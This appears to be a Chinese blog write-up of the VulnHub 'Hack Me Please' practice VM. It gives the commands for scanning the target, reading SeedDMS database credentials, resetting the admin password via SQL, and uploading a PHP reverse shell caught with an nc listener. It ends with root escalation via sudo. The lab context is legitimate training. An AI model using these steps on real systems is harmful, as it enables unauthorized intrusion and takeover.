vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
这是一个Web的漏洞靶机,老样子需要找到flag即可。
官方网站:https://download.vulnhub.com/hackmeplease/Hack_Me_Please.rar
kali里使用netdiscover
发现主机
渗透机:kali IP :192.168.0.106 靶机IP :192.168.0.102
使用命令:
nmap -sS -sV -A -n 192.168.0.102
可以看到开放了80
和3306
端口 先使用dirb
扫一下 好像没有可以用的信息 继续使用dirbuster
我们可以看到有css
和js
目录,里面应该还有东西没有扫描出来,我们换一个字典(默认的第五个)
可以看到js
里面好像有重要文件main.js
我们访问看到应该是seeddms
的CMS
建的网站。
我们现在知道了CMS
使用kali
本地漏洞库看一下,以看到最后一个47022.txt
前面写的是远程代码执行漏洞
①:要登录网站 ②:要添加一个document
把木马放进去③:要看我们改的document
的id
号
④:接上它的链接加木马去访问利用 我们才扫描过没发现登录地址,但是在main.js
里面看到了路径,我们扫描那个路径看看
在使用dirb
扫到了settings.xml
得到了数据库账号和密码:seeddms/seeddms
然后进行登入 登入成功!!
use seeddms;
show tables;
select * from users; #查询表
select * from tblUser;
select login,pwd from tblUsers;##查看表内容
update tblUsers set pwd=md5('123456') where login='admin'; #数据库修改密码
登入成功以后发现有上传点上传一个shell.php
然后添加成功后看id
号,然后我们要找上传后的绝对路径在下载的seeddms
框架中找到了其数据存放的目录为1048576
因此对靶机该目录进行扫描使用dirsearch -u http://192.168.0.102/seeddms51x/data/1048576 -e *
PS:如果是4
那么就访问/seeddms51x/data/1048576/4/shell.php
就能弹nc
这个序号是根据你上传了多少增加的,如果上传了两次就是5
可以用工具扫出来 这里我直接告诉大家了 不然到时候可能会卡住 我这边就是卡了好久 才回弹的shell
(麻烦给个三联)
/usr/share/webshells/php/php-reverse-shell.php #kali自带shell
nc -lvp 1234 #和shell.php一样的端口
先查看有哪些用户,发现了一个在mysql
中见到的用户,切换saket
用户
开启交换终端:python3 -c 'import pty;pty.spawn("/bin/bash")'
直接sudo -l
sudo su
提权成功!
①.这里的知识点是知道seeddmsCMS
上传后的路径:seeddms51x/data/1048576
找不i到的话就访问不了就不能nc
反弹shell
②.还有就是一些基本的渗透测试扫描工具的使用:dirb,dirbuster,dirsearch
③.数据库的基本命令使用会改密码 还有sudo
提权
希望对热爱打靶机的小伙伴有帮助!最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!